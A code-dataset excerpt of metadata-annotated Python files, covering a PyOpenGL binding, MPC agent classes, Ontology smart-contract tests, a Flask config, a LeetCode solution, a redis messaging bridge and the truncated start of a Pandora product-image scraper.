] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GLX/MESA/pixmap_colormap.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_pixmap_colormap'
@_f
@_p.types(_cs.GLXPixmap,ctypes.POINTER(_cs.Display),ctypes.POINTER(_cs.XVisualInfo),_cs.Pixmap,_cs.Colormap)
| 38.555556 | 120 | 0.783862 | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_MESA_pixmap_colormap'
def _f( function ):
    # Decorator used by the autogenerated bindings below: registers *function*
    # as an entry point of the 'GLX_MESA_pixmap_colormap' GLX extension with
    # the standard error checker attached.
    return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_MESA_pixmap_colormap',error_checker=_errors._error_checker)
@_f
@_p.types(_cs.GLXPixmap,ctypes.POINTER(_cs.Display),ctypes.POINTER(_cs.XVisualInfo),_cs.Pixmap,_cs.Colormap)
def glXCreateGLXPixmapMESA(dpy,visual,pixmap,cmap):pass
| 153 | 0 | 46 |
64e6de1504c2c09f42075f8ff35b9b1da282039e | 7,215 | py | Python | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | 1 | 2020-05-16T07:10:51.000Z | 2020-05-16T07:10:51.000Z | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | null | null | null | models/agents.py | michchr/HybridControlPy | 75d64810956fade5360f18b81332a781b31eebf9 | [
"MIT"
] | 1 | 2022-02-10T03:15:28.000Z | 2022-02-10T03:15:28.000Z | import bisect
from collections import OrderedDict
from reprlib import recursive_repr as _recursive_repr
# import pandas as pd
# pd.set_option('mode.chained_assignment', 'raise')
from controllers.mpc_controller import MpcController
from controllers.controller_base import ControllerBase
from structdict import StructDict, struct_repr, named_struct_dict
from models.mld_model import MldSystemModel, MldModel, MldInfo
from utils.func_utils import ParNotSet
from utils.helper_funcs import is_all_None
from typing import MutableMapping, AnyStr
| 37.774869 | 120 | 0.691892 | import bisect
from collections import OrderedDict
from reprlib import recursive_repr as _recursive_repr
# import pandas as pd
# pd.set_option('mode.chained_assignment', 'raise')
from controllers.mpc_controller import MpcController
from controllers.controller_base import ControllerBase
from structdict import StructDict, struct_repr, named_struct_dict
from models.mld_model import MldSystemModel, MldModel, MldInfo
from utils.func_utils import ParNotSet
from utils.helper_funcs import is_all_None
from typing import MutableMapping, AnyStr
class Agent:
    """Base agent wrapping a simulation model and an optional control model.

    Every instance registers itself in the class-level registry
    ``_device_type_id_struct`` (shared by all subclasses), keyed by
    ``device_type``, so that unique ``device_id`` values can be auto-assigned
    per device type.
    """
    # Shared registry: {device_type: StructDict(id_set=set_of_ids,
    #                                           id_list=sorted list of ids)}
    _device_type_id_struct = StructDict()
    def __init__(self, device_type=None, device_id=None,
                 sim_model: MldSystemModel = ParNotSet,
                 control_model: MldSystemModel = ParNotSet):
        self._device_type = None
        self._device_id = None
        self._sim_model = None
        self._control_model = None
        # Register (type, id) first, then attach models.
        self.update_device_data(device_type=device_type, device_id=device_id)
        self.update_models(sim_model=sim_model, control_model=control_model)
    # todo Still needs work
    @classmethod
    def delete_all_devices(cls):
        # Wipe the shared registry; existing instances keep their ids but are
        # no longer tracked.
        cls._device_type_id_struct.clear()
    def update_device_data(self, device_type=None, device_id=None):
        """Set/replace device type and id, auto-assigning a unique id within
        the type when ``device_id`` is None.

        Raises:
            ValueError: if ``device_id`` is already taken for this type.
        """
        # Fall back to previous values; type defaults to 'not_specified'.
        self._device_type = device_type if device_type is not None else self._device_type or 'not_specified'
        self._device_id = device_id if device_id is not None else self._device_id
        if self._device_type in self._device_type_id_struct:
            _id_set = self._device_type_id_struct[self._device_type].id_set
            _id_list = self._device_type_id_struct[self._device_type].id_list
            if self.device_id in _id_set:
                raise ValueError(
                    "Agent with type:'{}' and device_id:'{}' already exists".format(self._device_type, self.device_id))
            elif self.device_id is None:
                # Auto-assign: one past the current largest id for this type.
                self._device_id = (_id_list[-1] + 1) if _id_list else 1
            _id_set.add(self._device_id)
            bisect.insort(_id_list, self._device_id)  # keep id_list sorted
        else:
            # First agent of this type: create the registry slot.
            if self.device_id is None:
                self._device_id = 1
            self._device_type_id_struct[self._device_type] = StructDict(id_set=set(), id_list=[])
            self._device_type_id_struct[self._device_type].id_set.add(self._device_id)
            self._device_type_id_struct[self._device_type].id_list.append(self._device_id)
    def update_models(self, sim_model: MldSystemModel = ParNotSet,
                      control_model: MldSystemModel = ParNotSet):
        """Attach models; ParNotSet keeps the current model, None resets it."""
        if is_all_None(self._sim_model, self._control_model, sim_model, control_model):
            # Nothing supplied anywhere: fall back to a default sim model.
            self._sim_model = MldSystemModel()
            self._control_model = None
        else:
            self._sim_model = sim_model if sim_model is not ParNotSet else self._sim_model or MldSystemModel()
            self._control_model = control_model if control_model is not ParNotSet else self._control_model or None
    # todo think about cleanup
    def __del__(self):
        # print("deleting")
        # Best-effort deregistration: remove this id from both the id_set and
        # id_list of its type; errors (e.g. already removed) are ignored.
        for col in self._device_type_id_struct[self._device_type].values():
            try:
                col.remove(self._device_id)
            except Exception:
                pass
    @property
    def device_type(self):
        return self._device_type
    @property
    def device_id(self):
        return self._device_id
    @property
    def sim_model(self) -> MldSystemModel:
        return self._sim_model
    @property
    def control_model(self) -> MldSystemModel:
        # Falls back to the simulation model when no control model is set.
        return self._control_model if self._control_model is not None else self._sim_model
    @property
    def mld_numeric(self) -> MldModel:
        return self._sim_model._mld_numeric
    @property
    def mld_info(self) -> MldInfo:
        return self.mld_numeric.mld_info
    @property
    def mld_numeric_tilde(self):
        # Base agents carry no time-varying model sequence.
        return None
    @_recursive_repr()
    def __repr__(self):
        repr_dict = OrderedDict(device_type=self.device_type,
                                device_id=self.device_id,
                                sim_model=self.sim_model,
                                control_model=self.control_model)
        return struct_repr(repr_dict, type_name=self.__class__.__name__)
class ControlledAgent(Agent):
    """Agent that owns a named collection of controllers.

    Controllers are kept in a ``ControllersStruct`` mapping of
    name -> controller instance; swapping models resets every controller.
    """
    ControllersStruct = named_struct_dict('ControllersStruct')
    def __init__(self, device_type=None, device_id=None, sim_model=None, control_model=None):
        self._controllers: MutableMapping[AnyStr, ControllerBase] = self.ControllersStruct()
        super().__init__(device_type=device_type, device_id=device_id,
                         sim_model=sim_model, control_model=control_model)
    def update_models(self, sim_model: MldSystemModel = ParNotSet,
                      control_model: MldSystemModel = ParNotSet):
        """Swap models, then reset each attached controller so any cached
        components are rebuilt against the new models."""
        super().update_models(sim_model=sim_model, control_model=control_model)
        for attached in self._controllers.values():
            attached.reset_components()
    @property
    def controllers(self):
        """Mapping of controller name -> controller instance."""
        return self._controllers
    def add_controller(self, name, controller_type, x_k=None, omega_tilde_k=None, N_p=None, N_tilde=None):
        """Instantiate ``controller_type`` bound to this agent and register it
        under ``name`` (replacing any previous controller of that name)."""
        new_controller = controller_type(agent=self, x_k=x_k, omega_tilde_k=omega_tilde_k,
                                         N_p=N_p, N_tilde=N_tilde)
        self._controllers[name] = new_controller
    def delete_controller(self, name):
        """Remove the controller registered under ``name`` (KeyError if absent)."""
        self._controllers.pop(name)
    def delete_all_controllers(self):
        """Drop every registered controller."""
        self._controllers.clear()
class MpcAgent(Agent):
    """Agent driven by a single built-in :class:`MpcController`.

    Thin facade: the horizon, state and disturbance properties all delegate
    to the owned controller.
    """
    def __init__(self, device_type=None, device_id=None, sim_model=None, control_model=None, N_p=None, N_tilde=None):
        super().__init__(device_type=device_type, device_id=device_id, sim_model=sim_model, control_model=control_model)
        self._mpc_controller = MpcController(agent=self, N_p=N_p, N_tilde=N_tilde)
    def update_models(self, sim_model: MldSystemModel = ParNotSet,
                      control_model: MldSystemModel = ParNotSet):
        """Swap models and reset the controller's cached components."""
        super(MpcAgent, self).update_models(sim_model=sim_model, control_model=control_model)
        # getattr guard: the base __init__ calls update_models before
        # _mpc_controller exists on this instance.
        mpc_controller: MpcController = getattr(self, '_mpc_controller', None)
        if mpc_controller:
            mpc_controller.reset_components()
    def update_horizons(self, N_p=ParNotSet, N_tilde=ParNotSet):
        """Update prediction horizons; defaults keep N_p and use N_tilde = N_p + 1."""
        N_p = N_p if N_p is not ParNotSet else self.N_p or 0
        N_tilde = N_tilde if N_tilde is not ParNotSet else N_p + 1
        self._mpc_controller.update_horizons(N_p=N_p, N_tilde=N_tilde)
    @property
    def mpc_controller(self) -> MpcController:
        return self._mpc_controller
    @property
    def N_p(self):
        # Prediction horizon, or None before the controller exists.
        return self._mpc_controller.N_p if self._mpc_controller else None
    @property
    def N_tilde(self):
        return self._mpc_controller.N_tilde if self._mpc_controller else None
    @property
    def x_k(self):
        # Current state estimate held by the controller.
        return self._mpc_controller.x_k
    @x_k.setter
    def x_k(self, x_k):
        self._mpc_controller.x_k = x_k
    @property
    def omega_tilde_k_hat(self):
        # Forecast disturbance sequence held by the controller.
        return self._mpc_controller.omega_tilde_k
    @omega_tilde_k_hat.setter
    def omega_tilde_k_hat(self, omega_tilde_k_hat):
        self._mpc_controller.omega_tilde_k = omega_tilde_k_hat
| 5,385 | 1,215 | 69 |
e7c5b2a3eb3df4f97e0326f7ff5cf6ac5fce2de0 | 4,208 | py | Python | test/test_invoke_saving_pot.py | punica-box/saving-pot-box | 8824e3621b21a8e06ac398c29e7ec07ac1442d1f | [
"MIT"
] | 1 | 2018-11-17T10:37:38.000Z | 2018-11-17T10:37:38.000Z | test/test_invoke_saving_pot.py | NashMiao/saving-pot-box | 0ea7b0ee4be8aadf069faacf1d862d7412d5b4da | [
"MIT"
] | null | null | null | test/test_invoke_saving_pot.py | NashMiao/saving-pot-box | 0ea7b0ee4be8aadf069faacf1d862d7412d5b4da | [
"MIT"
] | 1 | 2018-11-10T15:56:58.000Z | 2018-11-10T15:56:58.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import time
import unittest
from unittest.mock import patch
from ontology.ont_sdk import OntologySdk
from ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction
from ontology.smart_contract.neo_contract.abi.abi_info import AbiInfo
from ontology.wallet.wallet_manager import WalletManager
from pot.default_settings import (
GAS_LIMIT,
GAS_PRICE,
WALLET_PATH,
CONTRACT_ABI,
ONT_RPC_ADDRESS,
CONTRACT_ADDRESS_HEX
)
from pot.invoke_saving_pot import InvokeSavingPot
ontology = OntologySdk()
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
wallet_manager = WalletManager()
wallet_manager.open_wallet(WALLET_PATH)
password = input('password: ')
gas_limit = 20000000
gas_price = 500
acct = wallet_manager.get_account('AKeDu9QW6hfAhwpvCwNNwkEQt1LkUQpBpW', password)
saving_pot = InvokeSavingPot(ontology, CONTRACT_ABI, CONTRACT_ADDRESS_HEX)
if __name__ == '__main__':
unittest.main()
| 38.605505 | 89 | 0.73788 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import time
import unittest
from unittest.mock import patch
from ontology.ont_sdk import OntologySdk
from ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction
from ontology.smart_contract.neo_contract.abi.abi_info import AbiInfo
from ontology.wallet.wallet_manager import WalletManager
from pot.default_settings import (
GAS_LIMIT,
GAS_PRICE,
WALLET_PATH,
CONTRACT_ABI,
ONT_RPC_ADDRESS,
CONTRACT_ADDRESS_HEX
)
from pot.invoke_saving_pot import InvokeSavingPot
ontology = OntologySdk()
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
wallet_manager = WalletManager()
wallet_manager.open_wallet(WALLET_PATH)
password = input('password: ')
gas_limit = 20000000
gas_price = 500
acct = wallet_manager.get_account('AKeDu9QW6hfAhwpvCwNNwkEQt1LkUQpBpW', password)
saving_pot = InvokeSavingPot(ontology, CONTRACT_ABI, CONTRACT_ADDRESS_HEX)
class TestInvokeSavingPot(unittest.TestCase):
    """Integration tests for InvokeSavingPot against a live Ontology test-net.

    These tests spend (test-net) ONT/ONG and depend on the remote RPC node
    plus the module-level ``acct``/``saving_pot`` fixtures, so they are not
    hermetic unit tests.
    """
    def test_create_ont_pot(self):
        # A successful invoke returns a 64-hex-char transaction hash.
        time_limit = 60
        tx_hash = saving_pot.create_ont_pot(acct, time_limit, GAS_LIMIT, GAS_PRICE)
        self.assertEqual(64, len(tx_hash))
    def test_create_ong_pot(self):
        time_limit = 60
        tx_hash = saving_pot.create_ong_pot(acct, time_limit, GAS_LIMIT, GAS_PRICE)
        self.assertEqual(64, len(tx_hash))
        print(tx_hash)
    def test_put_get_ont_pot_tx_hash(self):
        # Round-trip: store the tx hash on-chain, then read it back.
        tx_hash = '88ba0f7d36aaaad08b9fa23bd85f202da64eb8baa2ed9204f9a89b1882a34dd8'
        saving_pot.put_ont_pot_tx_hash(acct, tx_hash, GAS_LIMIT, GAS_PRICE)
        data = saving_pot.get_ont_pot_tx_hash(acct.get_address().to_array())
        self.assertEqual(tx_hash, data)
    def test_put_get_ong_pot_tx_hash(self):
        tx_hash = '861d6ecfca6413639f753d53d1267637a410930552546443f287f43af6877181'
        saving_pot.put_ong_pot_tx_hash(acct, tx_hash, GAS_LIMIT, GAS_PRICE)
        data = saving_pot.get_ong_pot_tx_hash(acct.get_address().to_array())
        self.assertEqual(tx_hash, data)
    def test_saving_ont(self):
        amount = 1
        balance1 = ontology.rpc.get_balance(acct.get_address_base58())
        tx_hash = saving_pot.saving_ont(acct, amount, GAS_LIMIT, GAS_PRICE)
        self.assertEqual(64, len(tx_hash))
        time.sleep(6)  # wait for the tx to be included in a block
        print(ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash))
        balance2 = ontology.rpc.get_balance(acct.get_address_base58())
        # NOTE(review): get_balance's return type is not visible here; this
        # comparison assumes it is numeric -- confirm against the SDK.
        self.assertEqual(balance1, balance2 + 1)
    def test_saving_ong(self):
        amount = 1
        print(ontology.rpc.get_balance(acct.get_address_base58()))
        tx_hash = saving_pot.saving_ong(acct, amount, GAS_LIMIT, GAS_PRICE)
        self.assertEqual(64, len(tx_hash))
        time.sleep(6)  # wait for the tx to be included in a block
        print(ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash))
        print(ontology.rpc.get_balance(acct.get_address_base58()))
    def test_take_ont_out(self):
        # Bug fix: this test previously called take_ong_out(), duplicating
        # test_take_ong_out and leaving take_ont_out() untested.
        tx_hash = saving_pot.take_ont_out(acct, GAS_LIMIT, GAS_PRICE)
        print(tx_hash)
    def test_take_ong_out(self):
        tx_hash = saving_pot.take_ong_out(acct, GAS_LIMIT, GAS_PRICE)
        print(tx_hash)
    def test_query_ont_pot_saving_time(self):
        saving_time = saving_pot.query_ont_pot_saving_time(acct.get_address().to_array())
        self.assertEqual(60, saving_time)
    def test_query_ong_pot_saving_time(self):
        print(acct.get_address().to_array())
        print(type(acct.get_address().to_array()))
        saving_time = saving_pot.query_ong_pot_saving_time(acct.get_address().to_array())
        self.assertEqual(60, saving_time)
    def test_query_create_pot_event(self):
        # Known historic transactions with fixed timestamps in their events.
        tx_hash = 'a772593b4755c0d412b824617a8cc5564ef75f20623417a6cc97cf3a727819a0'
        event = saving_pot.query_create_pot_event(tx_hash)
        self.assertIn('saving time', event)
        self.assertIn('2018-11-22 20:14:32', event)
        tx_hash = '25224b02bd5d89b4c5f4a1da322162ffc4fe0c2a1c7ab1dc3f8a0c080be63eca'
        event = saving_pot.query_create_pot_event(tx_hash)
        self.assertIn('saving time', event)
        self.assertIn('2018-11-22 20:58:30', event)
if __name__ == '__main__':
unittest.main()
| 2,833 | 24 | 319 |
3819d955d228cdd08ec15658407df47f685a3639 | 784 | py | Python | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | null | null | null | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | 1 | 2021-04-30T20:44:10.000Z | 2021-04-30T20:44:10.000Z | config.py | apython1998/porchfest_radio | d120578e90c99606d59868adbf19a2e2d3775dc9 | [
"MIT"
] | null | null | null | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
| 39.2 | 71 | 0.701531 | import os
from dotenv import load_dotenv
basedir = os.path.abspath(os.path.dirname(__file__))
load_dotenv(os.path.join(basedir, '.env'))
class Config(object):
    """Application configuration, read from the environment with dev defaults."""
    # Session/signing secret; override via SECRET_KEY in production.
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guess'
    # MongoDB connection settings (local instance by default).
    MONGODB_SETTINGS = {
        'db': 'porchfest_radio',
        'host': 'mongodb://localhost/porchfest_radio'
    }
    # Comma-separated admin addresses (single default address otherwise).
    ADMINS = os.environ.get('ADMINS') or 'your.email@example.com'
    UPLOAD_FOLDER = os.environ.get('UPLOAD_FOLDER') or 'uploads/'
    # AWS S3 credentials; all None when not configured.
    S3_BUCKET = os.environ.get('S3_BUCKET_NAME') or None
    S3_KEY = os.environ.get('S3_ACCESS_KEY') or None
    S3_SECRET = os.environ.get('S3_SECRET_ACCESS_KEY') or None
    # NOTE(review): evaluates to 'http://None.s3.amazonaws.com/' when
    # S3_BUCKET is unset -- callers presumably check S3_BUCKET first; confirm.
    S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)
    CLOUDFRONT_URL = os.environ.get('CLOUDFRONT_URL') or None
| 0 | 623 | 23 |
f5c5906f366de46db049d2907d3e8017997f8386 | 619 | py | Python | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null | src/main/python/leetcode-python/easy/400.Nth Digit.py | sonymoon/algorithm | cc2a9e0125fc64bdbf6549034bad6482d2027ea2 | [
"Apache-2.0"
] | null | null | null |
print(Solution().findNthDigit(194))
class Solution:
    def findNthDigit(self, n):
        """Return the n-th digit (1-indexed) of the sequence 123456789101112...

        There are 9 * 10**(d-1) numbers with d digits, contributing
        9 * 10**(d-1) * d digits in total. Skip whole digit-groups, then
        index into the remaining group. Time O(log10 n), space O(1).

        Fixes vs. original: removes the debug print (library code must not
        write to stdout) and replaces the hard-coded range(1, 11) loop so
        arbitrarily large n is handled.

        :type n: int
        :rtype: int
        """
        if n < 10:
            return n
        digits = 1
        while True:
            # Total digits contributed by all `digits`-digit numbers.
            group_size = (10 ** digits - 10 ** (digits - 1)) * digits
            if n <= group_size:
                break
            n -= group_size
            digits += 1
        # n is now a 1-based offset into the `digits`-digit group.
        index, offset = divmod(n - 1, digits)
        number = 10 ** (digits - 1) + index
        return int(str(number)[offset])
print(Solution().findNthDigit(194))
| 0 | 559 | 22 |
8064cb779b30bc7cc41fa4ed8c9047964653750a | 5,132 | py | Python | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 20 | 2016-04-30T11:24:45.000Z | 2021-11-09T10:39:25.000Z | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 1 | 2020-09-23T13:36:58.000Z | 2020-09-23T13:36:58.000Z | python/bridge.py | bmilde/ambientsearch | 74bf83a313e19da54a4e44158063041f981424c9 | [
"Apache-2.0"
] | 8 | 2015-10-07T13:40:36.000Z | 2019-08-07T06:45:24.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde'
import requests
import json
import redis
import re
from timer import Timer
red = redis.StrictRedis()
#Todo: refactor. This has been mved to the relevant event generator
#Abstracts away the details of communicating with the ambient server
#Do most of the message passing with redis, now standard version | 43.863248 | 211 | 0.67537 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde'
import requests
import json
import redis
import re
from timer import Timer
red = redis.StrictRedis()
#Todo: refactor. This has been mved to the relevant event generator
def idFromTitle(title):
    """Build an id-safe slug from *title*: every non-word character
    (anything but letters, digits and underscore -- including spaces,
    quotes and parentheses) becomes '_'."""
    return re.sub(r'\W', '_', title)
#Abstracts away the details of communicating with the ambient server
class KeywordClientHttp():
    """HTTP transport to the ambient server.

    Mirrors KeywordClient's event vocabulary, but delivers each event as a
    JSON POST to ``server_url + <endpoint>`` instead of publishing through
    redis; finalized-utterance and reset notifications additionally go out
    on the 'ambient_transcript_only' redis channel.
    """
    def __init__(self, server_url):
        self.server_url = server_url
        self.request_header = {'Content-type': 'application/json', 'Accept': 'text/plain'}
    def _post(self, endpoint, payload):
        # Serialize one event and POST it; the server answers with a bare status.
        response = requests.post(self.server_url + endpoint, data=json.dumps(payload), headers=self.request_header)
        return response.status_code
    def getSettings(self):
        """Fetch the server-side settings as a dict."""
        response = requests.get(self.server_url + 'getSettings')
        return response.json()
    def addRelevantEntry(self, type, title, text, url, score, insert_before):
        """Announce a new relevant entry; its DOM id is derived from the title."""
        payload = {'handle': 'addRelevantEntry', 'type': type, 'entry_id': idFromTitle(title), 'title': title,
                   'text': text, 'url': url, 'score': score, 'insert_before': insert_before}
        return self._post('addRelevantEntry', payload)
    def delRelevantEntry(self, type, title):
        """Retract a previously announced entry."""
        payload = {'handle': 'delRelevantEntry', 'type': type, 'title': title, 'entry_id': idFromTitle(title)}
        return self._post('delRelevantEntry', payload)
    def addUtterance(self, utterance, speaker):
        """Append a new (partial) utterance for *speaker*."""
        payload = {'handle': 'addUtterance', 'utterance': utterance, 'speaker': speaker}
        return self._post('addUtterance', payload)
    def replaceLastUtterance(self, old_utterance, new_utterance, speaker):
        """Replace the most recent utterance with a corrected hypothesis."""
        payload = {'handle': 'replaceLastUtterance', 'old_utterance': old_utterance, 'utterance': new_utterance,
                   'speaker': speaker}
        return self._post('replaceLastUtterance', payload)
    def completeUtterance(self, utterance, speaker):
        """Publish a finalized utterance on the transcript-only redis channel."""
        payload = {'handle': 'completeUtterance', 'utterance': utterance, 'speaker': speaker}
        red.publish('ambient_transcript_only', json.dumps(payload))
    def reset(self):
        """Reset both the transcript channel subscribers and the HTTP server."""
        payload = {'handle': 'reset'}
        red.publish('ambient_transcript_only', json.dumps(payload))
        return self._post('reset', payload)
#Do most of the message passing with redis, now standard version
class KeywordClient():
    """Publishes transcription/relevance events to the ambient UI via redis.

    Entry events go out on channel 'ambient'; finalized utterances and resets
    on 'ambient_transcript_only'. Each published event is stamped with the
    seconds elapsed since the first event after the last reset (the Timer is
    started lazily). NOTE(review): this module uses Python 2 ``print``
    statements and is therefore Python 2 only.
    """
    def __init__(self,server_url=""):
        self.server_url = server_url
        self.request_header = {'Content-type': 'application/json', 'Accept': 'text/plain'}
        # Timer is started lazily by the first published event.
        self.timer_started = False
        self.timer = Timer()
    def checkTimer(self):
        # Start the relative clock on first use only.
        if not self.timer_started:
            self.timer.start()
            self.timer_started = True
    def resetTimer(self):
        # Restart the clock; the next checkTimer() call will restart it again.
        self.timer_started = False
        self.timer.start()
    def getSettings(self):
        # Settings are still fetched over HTTP from the ambient server.
        r = requests.get(self.server_url+'getSettings')
        return r.json()
    def sendCategories(self, categories):
        data = {'handle':'setCategories', 'categories':categories}
        red.publish('ambient', json.dumps(data))
    def addRelevantEntry(self, type, title, text, url, score, insert_before):
        """Announce a new relevant entry (id derived from the title)."""
        self.checkTimer()
        data = {'handle':'addRelevantEntry','type':type,'entry_id': idFromTitle(title),'title':title,'text':text,'url':url,'score':score, 'insert_before': insert_before, 'time': float(self.timer.current_secs())}
        print data
        red.publish('ambient', json.dumps(data))
    def delRelevantEntry(self, type, title):
        """Retract a previously announced entry."""
        self.checkTimer()
        data = {'handle':'delRelevantEntry','type':type,'title': title, 'entry_id': idFromTitle(title), 'time': float(self.timer.current_secs())}
        red.publish('ambient', json.dumps(data))
    def addUtterance(self, utterance, speaker):
        """Append a new (partial) utterance for *speaker*."""
        self.checkTimer()
        data = {'handle':'addUtterance','utterance':utterance,'speaker':speaker, 'time': float(self.timer.current_secs())}
        red.publish('ambient', json.dumps(data))
    def replaceLastUtterance(self, old_utterance, new_utterance, speaker):
        """Replace the most recent utterance with a corrected hypothesis."""
        self.checkTimer()
        data = {'handle':'replaceLastUtterance','old_utterance':old_utterance,'utterance':new_utterance,'speaker':speaker, 'time': float(self.timer.current_secs())}
        red.publish('ambient', json.dumps(data))
    def completeUtterance(self, utterance, speaker):
        """Publish a finalized utterance on the transcript-only channel."""
        self.checkTimer()
        data = {'handle':'completeUtterance','utterance':utterance,'speaker':speaker , 'time': float(self.timer.current_secs())}
        print data
        red.publish('ambient_transcript_only', json.dumps(data))
    def reset(self):
        """Reset subscribers, restart the clock and notify the HTTP server.

        NOTE(review): with the default server_url of "" the POST goes to the
        relative URL 'reset', which requests cannot resolve -- confirm callers
        always pass a full server_url before relying on the HTTP reset.
        """
        data = {'handle':'reset'}
        red.publish('ambient_transcript_only', json.dumps(data))
        self.resetTimer()
        r = requests.post(self.server_url+'reset', data=json.dumps(data), headers=self.request_header)
        return r.status_code
e5971ec81aae8b6929e0ae0e93757b73ff60b49f | 5,052 | py | Python | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 1 | 2021-02-15T08:08:38.000Z | 2021-02-15T08:08:38.000Z | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 3 | 2021-02-24T10:43:41.000Z | 2021-06-21T12:54:51.000Z | data_code/image_scraping.py | natashanorsker/fagprojekt | ef9a8cc2128c43d891c8a7a47e14916af2b9c602 | [
"MIT"
] | 1 | 2021-02-15T10:50:19.000Z | 2021-02-15T10:50:19.000Z | # imports
import requests
import json
from bs4 import BeautifulSoup
from tqdm import tqdm
import random
from utilities import dict_from_json
#websites: (these are the websites with the same format as UK)
#does not work:
#'https://us.pandora.net/en/jewelry/?start={}&sz=36&format=page-element''
websites = ['https://cn.pandora.net/zh/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://jp.pandora.net/ja/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nz.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://sg.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://dk.pandora.net/da/smykker/?start={}&sz=36&format=page-element',
'https://de.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://fr.pandora.net/fr/bijoux/?start={}&sz=36&format=page-element',
'https://it.pandora.net/it/gioielli/?start={}&sz=36&format=page-element',
'https://uk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nl.pandora.net/nl/sieraden/?start={}&sz=36&format=page-element',
'https://pl.pandora.net/pl/bizuteria/?start={}&sz=36&format=page-element',
'https://se.pandora.net/sv/smycken/?start={}&sz=36&format=page-element',
'https://at.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://au.pandora.net/en/jewellery/?start={}&sz=36&format=page-element']
headers = ['Mozilla/5.0 CK={} (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148']
if __name__ == "__main__":
new_catalog = create_catalog(save=True, websites=websites)
has_no_class = dict_from_json('id_not_in_masterfile.json')
for product in has_no_class:
if product in new_catalog.keys():
new_catalog.pop(product)
a_file = open("../catalog.json", "w")
json.dump(new_catalog, a_file)
a_file.close() | 45.513514 | 207 | 0.617973 | # imports
import requests
import json
from bs4 import BeautifulSoup
from tqdm import tqdm
import random
from utilities import dict_from_json
#websites: (these are the websites with the same format as UK)
#does not work:
#'https://us.pandora.net/en/jewelry/?start={}&sz=36&format=page-element''
websites = ['https://cn.pandora.net/zh/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://jp.pandora.net/ja/jewellery/?start={}&sz=36&format=page-element',
'https://hk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nz.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://sg.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://dk.pandora.net/da/smykker/?start={}&sz=36&format=page-element',
'https://de.pandora.net/de/schmuck/?start={}&sz=36&format=page-element',
'https://fr.pandora.net/fr/bijoux/?start={}&sz=36&format=page-element',
'https://it.pandora.net/it/gioielli/?start={}&sz=36&format=page-element',
'https://uk.pandora.net/en/jewellery/?start={}&sz=36&format=page-element',
'https://nl.pandora.net/nl/sieraden/?start={}&sz=36&format=page-element',
